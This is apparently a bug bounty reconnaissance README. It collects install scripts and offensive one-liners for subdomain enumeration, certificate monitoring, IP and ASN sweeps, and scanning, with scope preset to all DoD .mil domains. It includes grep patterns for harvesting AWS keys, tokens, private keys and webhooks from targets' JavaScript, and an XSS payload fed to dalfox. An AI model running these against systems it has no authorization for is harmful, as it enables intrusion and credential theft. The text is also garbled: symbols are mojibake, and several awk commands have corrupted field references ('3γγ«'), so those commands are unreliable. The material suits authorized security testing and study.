The Ultimate Bug Bounty Reconnaissance Arsenal
"In the shadows we hunt, in the code we trust"
Stars Forks Last Commit License
Full DoD Scope - 19 Domains
# BBRF Scope - All DoD Domains bbrf inscope add '*.af.mil' '*.army.mil' '*.marines.mil' '*.navy.mil' '*.spaceforce.mil' '*.ussf.mil' '*.pentagon.mil' '*.osd.mil' '*.disa.mil' '*.dtra.mil' '*.dla.mil' '*.dcma.mil' '*.dtic.mil' '*.dau.mil' '*.health.mil' '*.ng.mil' '*.uscg.mil' '*.socom.mil' '*.dds.mil' '*.yellowribbon.mil'
| Military Branches | DoD Agencies | Support Commands |
|---|---|---|
*.af.mil - Air Force |
*.pentagon.mil - Pentagon HQ |
*.dtic.mil - Tech Info Center |
*.army.mil - Army |
*.osd.mil - Office of SecDef |
*.dau.mil - Acquisition Univ |
*.marines.mil - Marines |
*.disa.mil - Defense Info Systems |
*.health.mil - Military Health |
*.navy.mil - Navy |
*.dtra.mil - Threat Reduction |
*.ng.mil - National Guard |
*.spaceforce.mil - Space Force |
*.dla.mil - Logistics Agency |
*.uscg.mil - Coast Guard |
*.ussf.mil - Space Force |
*.dcma.mil - Contract Management |
*.socom.mil - Special Operations |
This repository is for EDUCATIONAL and AUTHORIZED testing ONLY. Always obtain proper authorization before testing.
π Click to read our Security Policy & Guidelines
- β Authorized Bug Bounty Programs - HackerOne, Bugcrowd, Intigriti, etc.
- β Authorized Penetration Testing - With written permission
- β Personal Lab Environments - Your own infrastructure
- β Educational Purposes - Learning and research
- β DoD VDP Program - Following program rules
- β Unauthorized Testing - Testing without explicit permission
- β Malicious Intent - Using techniques for harm or theft
- β Out-of-Scope Testing - Testing targets outside program scope
- β Social Engineering - Unless explicitly allowed in program
- β DoS/DDoS Attacks - Resource exhaustion attacks
- Read the Program Policy - Always review scope and rules
- Test Safely - Don't cause harm to production systems
- Document Everything - Keep detailed notes of your findings
- Report Privately - Use official channels for disclosure
- Give Time to Fix - Allow vendors reasonable time to patch
- Be Professional - Maintain ethical standards
Found a security issue in this repository? Please report it responsibly:
Click to expand navigation
| Section | Description |
|---|---|
| About | Project overview and goals |
| Quick Start | Get started in 5 minutes |
| Required Tools | Essential toolset |
| BBRF Scope DoD | DoD scope configuration |
| Subdomain Enumeration | Finding subdomains |
| JavaScript Recon | JS file analysis |
| XSS Detection | Cross-site scripting |
| SQL Injection | SQLi techniques |
| SSRF & SSTI | Server-side attacks |
| Web Crawling | Deep crawling methods |
| Parameter Discovery | Hidden params |
| Content Discovery | Sensitive files |
| Nuclei Scanning | Automated scanning |
| API Security Testing | API vulnerabilities |
| Cloud Security | AWS, GCP, Azure |
| Automation Scripts | Ready-to-use scripts |
| Bash Functions | Shell productivity |
| New Oneliners 2026 | CVE-2026 exploits & techniques |
| Oneliners 2024-2025 | Previous techniques |
| Search Engines | Hacker search engines |
| Wordlists | Best wordlists |
| Resources | Books, courses, blogs |
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β π― MISSION STATEMENT π― β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β Share elite bug bounty techniques from world-class hunters β
β Build the most comprehensive one-liner collection β
β Empower the security research community β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Our main goal is to share tips from well-known bug hunters. Using advanced recon methodology, we discover subdomains, APIs, tokens, and vulnerabilities that are exploitable. We aim to influence and educate the community with powerful one-liner techniques for better understanding and faster results.
π Curated Commands
Battle-tested from real hunters Methodology
π― Full Methodology
Recon to exploitation Updated
π Constantly Updated
New techniques weekly Community
π Community Driven
Top hunters worldwide
π Click to see detailed statistics
| Category | Count | Status |
|---|---|---|
| One-Liners | 400+ | β Active |
| Techniques | 50+ | β Active |
| Tools Covered | 100+ | β Active |
| CVE Examples | 20+ | β Active |
| DoD Domains | 19 | β Active |
| Contributors | Growing | π Growing |
| Last Update | 2026 | β Current |
# π₯ Step 1: Install essential tools (ProjectDiscovery Suite) go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest # π Step 2: Run your first reconnaissance chain subfinder -d target.com -silent | httpx -silent | nuclei -severity critical,high # π Step 3: Analyze results and profit! # Check the output for vulnerabilities and start reporting!
π¬ Want a complete automated workflow? Click here!
# π Advanced Quick Start - Complete Recon Pipeline TARGET="target.com" # Subdomain enumeration with multiple sources subfinder -d $TARGET -all -silent | \ httpx -silent -title -status-code -tech-detect -follow-redirects | \ tee subdomains_live.txt # Deep crawling and parameter discovery cat subdomains_live.txt | katana -silent -d 3 -jc | \ grep -E '\\.js$' | \ httpx -silent -mc 200 | \ tee js_files.txt # Vulnerability scanning with Nuclei nuclei -l subdomains_live.txt -severity critical,high,medium -silent -o nuclei_results.txt # π Results saved in: # - subdomains_live.txt (Live domains) # - js_files.txt (JavaScript files) # - nuclei_results.txt (Vulnerabilities found)
| Tip | Description |
|---|---|
| π | Always get proper authorization before testing |
| π | Keep detailed notes of your findings |
| π οΈ | Start with automated tools, then manual testing |
| π° | Focus on high-impact vulnerabilities first |
| π€ | Join the community and learn from others |
Click to expand complete tool list
| Category | Tools | Installation |
|---|---|---|
| Subdomain | Subfinder, Amass, Assetfinder, Findomain, Chaos | go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest |
| HTTP Probing | Httpx, Httprobe | go install github.com/projectdiscovery/httpx/cmd/httpx@latest |
| Crawling | Katana, Gospider, Hakrawler, Cariddi | go install github.com/projectdiscovery/katana/cmd/katana@latest |
| URLs | Gau, Waybackurls, Waymore | go install github.com/lc/gau/v2/cmd/gau@latest |
| Scanning | Nuclei, Jaeles, Naabu | go install github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest |
| XSS | Dalfox, XSStrike, Kxss, Airixss | go install github.com/hahwul/dalfox/v2@latest |
| SQLi | SQLMap, Ghauri | pip install sqlmap ghauri |
| Utilities | Anew, Qsreplace, Unfurl, Gf, Uro | go install github.com/tomnomnom/anew@latest |
| Fuzzing | Ffuf, Feroxbuster | go install github.com/ffuf/ffuf/v2@latest |
| JS Analysis | Subjs, LinkFinder, SecretFinder, Jsubfinder | go install github.com/lc/subjs@latest |
| Cert Monitoring | Certstream, Certstream-go | pip install certstream |
| DNS | Dnsx, Shuffledns, PureDNS, MassDNS, Dnsgen | go install github.com/projectdiscovery/dnsx/cmd/dnsx@latest |
| Reverse DNS | Hakrevdns, Prips | go install github.com/hakluke/hakrevdns@latest |
| API Discovery | Arjun, x8, ParamSpider | pip install arjun |
| Screenshots | Gowitness, Eyewitness | go install github.com/sensepost/gowitness@latest |
| Cloud | AWS CLI, CloudEnum, S3Scanner | pip install awscli |
| OSINT | Shodan CLI, Censys, Metabigor | pip install shodan censys |
| Git Recon | Trufflehog, Gitrob, Github-Subdomains | go install github.com/trufflesecurity/trufflehog/v3@latest |
| Scope Management | BBRF | pip install bbrf |
# Ubuntu/Debian sudo apt update && sudo apt install -y \ jq \ curl \ wget \ git \ python3 \ python3-pip \ golang-go \ nmap \ masscan \ chromium-browser \ parallel \ whois \ dnsutils \ libpcap-dev \ build-essential # macOS brew install jq curl wget git python3 go nmap masscan chromium parallel whois bind
# Add to ~/.bashrc or ~/.zshrc export GOPATH=$HOME/go export GOROOT=/usr/local/go export PATH=$PATH:$GOPATH/bin:$GOROOT/bin # Reload shell source ~/.bashrc # or source ~/.zshrc
#!/bin/bash # One-click install for all Go tools echo "[*] Installing Go tools..." go_tools=( # ProjectDiscovery "github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest" "github.com/projectdiscovery/httpx/cmd/httpx@latest" "github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest" "github.com/projectdiscovery/katana/cmd/katana@latest" "github.com/projectdiscovery/naabu/v2/cmd/naabu@latest" "github.com/projectdiscovery/dnsx/cmd/dnsx@latest" "github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest" "github.com/projectdiscovery/chaos-client/cmd/chaos@latest" # Tomnomnom "github.com/tomnomnom/waybackurls@latest" "github.com/tomnomnom/anew@latest" "github.com/tomnomnom/qsreplace@latest" "github.com/tomnomnom/unfurl@latest" "github.com/tomnomnom/gf@latest" "github.com/tomnomnom/assetfinder@latest" "github.com/tomnomnom/httprobe@latest" # Fuzzing & Crawling "github.com/ffuf/ffuf/v2@latest" "github.com/jaeles-project/gospider@latest" "github.com/hakluke/hakrawler@latest" "github.com/hakluke/hakrevdns@latest" # Security "github.com/hahwul/dalfox/v2@latest" "github.com/lc/gau/v2/cmd/gau@latest" "github.com/lc/subjs@latest" # Screenshots & Utils "github.com/sensepost/gowitness@latest" "github.com/d3mondev/puredns/v2@latest" "github.com/j3ssie/metabigor@latest" "github.com/Emoe/kxss@latest" "github.com/ferreiraklet/airixss@latest" "github.com/edoardottt/cariddi/cmd/cariddi@latest" "github.com/trufflesecurity/trufflehog/v3@latest" ) for tool in "${go_tools[@]}"; do echo "[+] Installing $tool" go install -v "$tool" 2>/dev/null done echo "[β] Go tools installed!"
#!/bin/bash # One-click install for all Python tools echo "[*] Installing Python tools..." pip3 install --upgrade pip pip3 install \ certstream \ sqlmap \ ghauri \ uro \ arjun \ paramspider \ shodan \ censys \ bbrf \ dnsgen \ waymore \ xsstrike \ s3scanner \ cloud_enum \ trufflehog echo "[β] Python tools installed!"
#!/bin/bash # Install Feroxbuster (Rust) echo "[*] Installing Rust tools..." # Install Rust if not present if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi # Install Feroxbuster cargo install feroxbuster echo "[β] Rust tools installed!"
#!/bin/bash # Install tools that require cloning echo "[*] Installing external tools..." TOOLS_DIR="$HOME/tools" mkdir -p $TOOLS_DIR && cd $TOOLS_DIR # LinkFinder git clone https://github.com/GerbenJavado/LinkFinder.git cd LinkFinder && pip3 install -r requirements.txt && cd .. # SecretFinder git clone https://github.com/m4ll0k/SecretFinder.git cd SecretFinder && pip3 install -r requirements.txt && cd .. # Findomain wget https://github.com/Findomain/Findomain/releases/latest/download/findomain-linux.zip unzip findomain-linux.zip && chmod +x findomain && sudo mv findomain /usr/local/bin/ # MassDNS git clone https://github.com/blechschmidt/massdns.git cd massdns && make && sudo mv bin/massdns /usr/local/bin/ && cd .. # Amass go install -v github.com/owasp-amass/amass/v4/...@master # GF Patterns git clone https://github.com/1ndianl33t/Gf-Patterns.git mkdir -p ~/.gf && cp Gf-Patterns/*.json ~/.gf/ echo "[β] External tools installed!"
#!/bin/bash # MASTER INSTALLER - Run all installation scripts echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ" echo "β KingOfBugBounty - Complete Tool Installation β" echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ" # System dependencies (run with sudo) echo "[1/5] Installing system dependencies..." sudo apt update && sudo apt install -y jq curl wget git python3 python3-pip golang-go nmap masscan chromium-browser parallel whois dnsutils libpcap-dev build-essential # Go environment echo "[2/5] Setting up Go environment..." echo 'export GOPATH=$HOME/go' >> ~/.bashrc echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc source ~/.bashrc # Go tools echo "[3/5] Installing Go tools..." go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest go install -v github.com/projectdiscovery/katana/cmd/katana@latest go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest go install -v github.com/projectdiscovery/dnsx/cmd/dnsx@latest go install -v github.com/projectdiscovery/shuffledns/cmd/shuffledns@latest go install -v github.com/tomnomnom/waybackurls@latest go install -v github.com/tomnomnom/anew@latest go install -v github.com/tomnomnom/qsreplace@latest go install -v github.com/tomnomnom/unfurl@latest go install -v github.com/tomnomnom/gf@latest go install -v github.com/tomnomnom/assetfinder@latest go install -v github.com/ffuf/ffuf/v2@latest go install -v github.com/hahwul/dalfox/v2@latest go install -v github.com/lc/gau/v2/cmd/gau@latest go install -v github.com/jaeles-project/gospider@latest go install -v github.com/hakluke/hakrawler@latest go install -v github.com/hakluke/hakrevdns@latest go install -v github.com/sensepost/gowitness@latest go install -v github.com/d3mondev/puredns/v2@latest go install -v github.com/owasp-amass/amass/v4/...@master # Python tools echo "[4/5] Installing Python tools..." pip3 install certstream sqlmap ghauri uro arjun shodan censys bbrf dnsgen waymore # Rust tools echo "[5/5] Installing Rust tools..." if ! command -v cargo &> /dev/null; then curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y source $HOME/.cargo/env fi cargo install feroxbuster # Update Nuclei templates nuclei -update-templates echo "" echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ" echo "β β Installation Complete! β" echo "ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ" echo "" echo "Run 'source ~/.bashrc' to reload your environment"
#!/bin/bash # Install essential wordlists WORDLIST_DIR="$HOME/wordlists" mkdir -p $WORDLIST_DIR && cd $WORDLIST_DIR # SecLists git clone https://github.com/danielmiessler/SecLists.git # Assetnote Wordlists wget -r --no-parent -R "index.html*" https://wordlists-cdn.assetnote.io/data/ -nH # OneListForAll git clone https://github.com/six2dez/OneListForAll.git # Resolvers wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt -O resolvers.txt wget https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt -O resolvers-trusted.txt echo "[β] Wordlists installed in $WORDLIST_DIR"
#!/bin/bash # Verify all tools are installed echo "Checking installed tools..." tools=("subfinder" "httpx" "nuclei" "katana" "naabu" "dnsx" "ffuf" "feroxbuster" "dalfox" "gau" "waybackurls" "anew" "qsreplace" "gf" "gospider" "hakrawler" "amass" "gowitness" "certstream" "sqlmap" "arjun" "shodan") for tool in "${tools[@]}"; do if command -v $tool &> /dev/null; then echo "[β] $tool" else echo "[β] $tool - NOT FOUND" fi done
# Add all DoD domains to BBRF scope bbrf inscope add '*.af.mil' '*.osd.mil' '*.marines.mil' '*.pentagon.mil' '*.disa.mil' '*.health.mil' '*.dau.mil' '*.dtra.mil' '*.ng.mil' '*.dds.mil' '*.uscg.mil' '*.army.mil' '*.dcma.mil' '*.dla.mil' '*.dtic.mil' '*.yellowribbon.mil' '*.socom.mil' '*.spaceforce.mil' '*.ussf.mil'
βββββββββββ ββββββββββ βββββββ βββββββ ββββ ββββ ββββββ βββββββ βββ
βββββββββββ βββββββββββββββββββββββββββββββββ βββββββββββββββββββββ βββ
βββββββββββ ββββββββββββββ ββββββ βββββββββββββββββββββββββββββββ βββ
βββββββββββ ββββββββββββββ ββββββ βββββββββββββββββββββββββββββββββββ
βββββββββββββββββββββββββββββββββββββββββββββ βββ ββββββ βββββββββ ββββββ
ββββββββ βββββββ βββββββ βββββββ βββββββ βββ ββββββ βββββββββ βββββ
β οΈ ENUMERATE EVERYTHING β οΈ
# β οΈ Ultimate subdomain enumeration - All tools combined subfinder -d target.com -all -silent | anew subs.txt amass enum -passive -d target.com | anew subs.txt assetfinder -subs-only target.com | anew subs.txt chaos -d target.com -silent | anew subs.txt findomain -t target.com -q | anew subs.txt cat subs.txt | httpx -silent -threads 200 | anew alive.txt
# β οΈ crt.sh extraction curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httpx -silent
# β οΈ Monitor certificates in real-time for specific keyword pip install certstream && python3 -c "import certstream; certstream.listen_for_events(lambda msg, ctx: print(msg['data']['leaf_cert']['subject']['CN']) if 'target' in str(msg.get('data',{}).get('leaf_cert',{}).get('subject',{}).get('CN','')) else None, url='wss://certstream.calidog.io/')"
# β οΈ Real-time cert monitoring filtered by domain keywords certstream --full | jq -r 'select(.data.leaf_cert.subject.CN != null) | .data.leaf_cert.subject.CN' | grep -iE "(target|company|brand)" | anew certstream_targets.txt
# β οΈ Extract all SANs (Subject Alternative Names) in real-time certstream --full | jq -r '.data.leaf_cert.extensions.subjectAltName // empty' | tr ',' '\n' | sed 's/DNS://g' | grep -E "target\.com$" | sort -u | anew certstream_subs.txt
# β οΈ Real-time cert discovery -> immediate alive check certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' 2>/dev/null | grep -iE "target" | sort -u | while read domain; do echo "$domain" | httpx -silent -timeout 3 | anew live_certs.txt; done
# β οΈ Monitor for potential phishing domains (brand impersonation) certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "(paypal|apple|google|microsoft|amazon|facebook|netflix|bank)" | grep -vE "\.(paypal|apple|google|microsoft|amazon|facebook|netflix)\.com$" | anew phishing_certs.txt
# β οΈ Real-time cert discovery -> automatic vulnerability scan certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -E "\.target\.com$" | sort -u | while read domain; do echo "https://$domain" | nuclei -t /nuclei-templates/technologies/ -silent; done
# β οΈ Collect all certificates for specific TLDs timeout 3600 bash -c 'certstream --full | jq -r ".data.leaf_cert.all_domains[]? // empty" | grep -E "\.(gov|mil|edu)$" | anew gov_mil_edu_certs.txt' &
# β οΈ Find wildcard certificates (*.domain.com) in real-time certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep "^\*\." | sed 's/^\*\.//' | sort -u | anew wildcard_domains.txt
# β οΈ Real-time certs -> resolve IP -> Shodan lookup certstream --full | jq -r '.data.leaf_cert.subject.CN // empty' | grep -iE "target" | while read domain; do IP=$(dig +short "$domain" | head -1); [ -n "$IP" ] && echo "$domain,$IP,$(shodan host $IP 2>/dev/null | head -3 | tr '\n' ' ')"; done | anew cert_shodan.txt
# β οΈ Full certificate logging with timestamps for analysis certstream --full | jq -c '{timestamp: now | strftime("%Y-%m-%d %H:%M:%S"), cn: .data.leaf_cert.subject.CN, domains: .data.leaf_cert.all_domains, issuer: .data.leaf_cert.issuer.O}' | grep -i "target" | tee -a certstream_log.json
# β οΈ Monitor multiple bug bounty targets simultaneously TARGETS="hackerone|bugcrowd|intigriti|yeswehack"; certstream --full | jq -r '.data.leaf_cert.all_domains[]? // empty' | grep -iE "$TARGETS" | anew bb_new_assets.txt &
# β οΈ Shodan recon -> Nuclei scan shodan domain target.com | awk '{print 3γγ«}' | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
# β οΈ Find all IPs from organization ASN echo 'target_org' | metabigor net --org -v | awk '{print 3γγ«}' | sed 's/[[0-9]]\+\.//g' | xargs -I@ sh -c 'prips @ | hakrevdns | anew'
shuffledns -d target.com -w wordlist.txt -r resolvers.txt -silent | httpx -silent | anew
subfinder -d target.com -recursive -all -silent | dnsx -silent | httpx -silent | anew recursive_subs.txt
# β οΈ HackerTarget curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1 | anew subs.txt # β οΈ RapidDNS curl -s "https://rapiddns.io/subdomain/target.com?full=1" | grep -oP '(?<=target="_blank">)[^<]+' | grep "target.com" | anew subs.txt # β οΈ Riddler.io curl -s "https://riddler.io/search/exportcsv?q=pld:target.com" | grep -oP '\b([a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?\.)+target\.com\b' | anew subs.txt # β οΈ AlienVault OTX curl -s "https://otx.alienvault.com/api/v1/indicators/domain/target.com/passive_dns" | jq -r '.passive_dns[].hostname' 2>/dev/null | sort -u | anew subs.txt # β οΈ URLScan.io curl -s "https://urlscan.io/api/v1/search/?q=domain:target.com" | jq -r '.results[].page.domain' 2>/dev/null | sort -u | anew subs.txt
github-subdomains -d target.com -t YOUR_GITHUB_TOKEN -o github_subs.txt
# β οΈ Using Censys API censys search "target.com" --index-type hosts | jq -r '.[] | .name' | sort -u | anew censys_subs.txt
# β οΈ SecurityTrails subdomain enumeration curl -s "https://api.securitytrails.com/v1/domain/target.com/subdomains" -H "APIKEY: YOUR_API_KEY" | jq -r '.subdomains[]' | sed 's/$/.target.com/' | anew subs.txt
# β οΈ Extract subdomains from Wayback Machine curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew wayback_subs.txt
# β οΈ CommonCrawl subdomain extraction curl -s "https://index.commoncrawl.org/CC-MAIN-2023-50-index?url=*.target.com&output=json" | jq -r '.url' | sed -e 's_https*://__' -e 's/\/.*//g' | sort -u | anew commoncrawl_subs.txt
# β οΈ VirusTotal API curl -s "https://www.virustotal.com/vtapi/v2/domain/report?apikey=YOUR_API_KEY&domain=target.com" | jq -r '.subdomains[]' 2>/dev/null | anew vt_subs.txt
# β οΈ Check for zone transfer vulnerability dig axfr @ns1.target.com target.com | grep -E "^[a-zA-Z0-9]" | awk '{print 1γγ«}' | sed 's/\.$//' | anew zone_transfer.txt
# β οΈ Find domains on same IP host target.com | awk '/has address/ {print 4γγ«}' | xargs -I@ sh -c 'curl -s "https://api.hackertarget.com/reverseiplookup/?q=@"' | anew reverse_ip.txt
# β οΈ Get ASN and scan all IP ranges whois -h whois.radb.net -- '-i origin AS12345' | grep -Eo "([0-9.]+){4}/[0-9]+" | xargs -I@ sh -c 'nmap -sL @ | grep "report for" | cut -d" " -f5' | httpx -silent | anew bgp_hosts.txt
# β οΈ Mass PTR lookup prips 192.168.1.0/24 | xargs -P50 -I@ sh -c 'host @ 2>/dev/null | grep "pointer" | cut -d" " -f5' | sed 's/\.$//' | anew ptr_subs.txt
# β οΈ THE ULTIMATE SUBDOMAIN HUNTER β οΈ (subfinder -d target.com -all -silent; amass enum -passive -d target.com; assetfinder -subs-only target.com; findomain -t target.com -q; chaos -d target.com -silent; curl -s "https://crt.sh/?q=%25.target.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g'; curl -s "https://api.hackertarget.com/hostsearch/?q=target.com" | cut -d',' -f1; curl -s "http://web.archive.org/cdx/search/cdx?url=*.target.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e 's/\/.*//g') | sort -u | httpx -silent -threads 100 | anew mega_subs.txt
# β οΈ Generate permutations and resolve cat subs.txt | dnsgen - | shuffledns -d target.com -r resolvers.txt -silent | anew permutation_subs.txt
# β οΈ Fast bruteforce with PureDNS
puredns bruteforce wordlist.txt target.com -r resolvers.txt -w puredns_subs.txt# β οΈ Extract subdomains from SSL certificates echo target.com | httpx -silent | xargs -I@ sh -c 'echo | openssl s_client -connect @:443 2>/dev/null | openssl x509 -noout -text | grep -oP "DNS:[^\s,]+" | sed "s/DNS://"' | sort -u | anew ssl_subs.txt
# β οΈ Find related hosts via favicon hash curl -s https://target.com/favicon.ico | md5sum | awk '{print 1γγ«}' | xargs -I@ shodan search "http.favicon.hash:@" --fields ip_str,hostnames | anew favicon_hosts.txt
# β οΈ Use Google dorks (manual or with tools) # site:*.target.com -www # inurl:target.com
ββββββββββββ βββββββββββ βββ βββββββ ββββββββ βββββββ βββββββ ββββ βββ
ββββββββββββ ββββββββββββββββ ββββββββββββββββββββββββββββββββββββββ βββ
βββ βββ ββββββββ ββββββ ββββββββββββββ βββ βββ βββββββββ βββ
βββ βββ ββββββββ ββββββ ββββββββββββββ βββ βββ βββββββββββββ
βββ ββββββββββββββββββββ βββ βββ βββββββββββββββββββββββββββββββ ββββββ
βββ βββββββββββββββββββ βββ βββ βββββββββββ βββββββ βββββββ βββ βββββ
π TLS/SSL Certificate Intelligence with TLSX π
# π Full TLS certificate details extraction echo target.com | tlsx -san -cn -so -sv -ss -serial -hash md5 -jarm -ja3 -wc -tps -ve -ce -ct -cdn -silent | tee tlsx_full.txt
# π Extract all subdomains from certificate SANs subfinder -d target.com -silent | tlsx -san -cn -silent -resp-only | grep -oE "[a-zA-Z0-9.-]+\.target\.com" | sort -u | anew san_subdomains.txt
# π Find hosts with expired SSL certificates cat hosts.txt | tlsx -expired -silent -cn -so | tee expired_certs.txt
# π Identify self-signed certificates (potential security issue) cat hosts.txt | tlsx -self-signed -silent -cn -so -hash sha256 | tee self_signed.txt
# π Find hosts with deprecated TLS versions (TLS 1.0/1.1) cat hosts.txt | tlsx -tls-version -silent | grep -E "(tls10|tls11)" | tee weak_tls_versions.txt
# π JARM fingerprint for server identification and correlation subfinder -d target.com -silent | httpx -silent | tlsx -jarm -silent -json | jq -r '[.host, .jarm_hash] | @tsv' | sort -k2 | anew jarm_fingerprints.txt
# π Analyze certificate chain and identify CA cat hosts.txt | tlsx -so -serial -hash sha256 -ve -ce -json -silent | jq -r '[.host, .issuer_cn, .not_after, .serial] | @tsv' | anew cert_chain_analysis.txt
# π Full cipher suite enumeration + TLS version subfinder -d target.com -silent | httpx -silent | tlsx -cipher -tls-version -silent -json | jq -r '[.host, .version, .cipher] | @tsv' | anew cipher_enum.txt
# π Find certificates where CN doesn't match the hostname cat hosts.txt | tlsx -mismatched -cn -san -silent | tee mismatched_certs.txt
# π Complete TLS intelligence gathering subfinder -d target.com -all -silent | httpx -silent -p 443,8443,4443,9443 | tlsx -san -cn -so -sv -ss -serial -expired -self-signed -mismatched -tls-version -jarm -hash sha256 -json -silent | jq -c '{host: .host, cn: .subject_cn, san: .san, issuer: .issuer_cn, expired: .expired, self_signed: .self_signed, tls: .version, jarm: .jarm_hash}' | tee tlsx_full_recon.json
subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txt
cat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txt
cat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txt
cat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txt
cat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -u
cat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -u
cat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -u
cat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txt
Extract Hidden Subdomains from JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txt
cat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txt
cat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txt
π Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txt
cat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bav
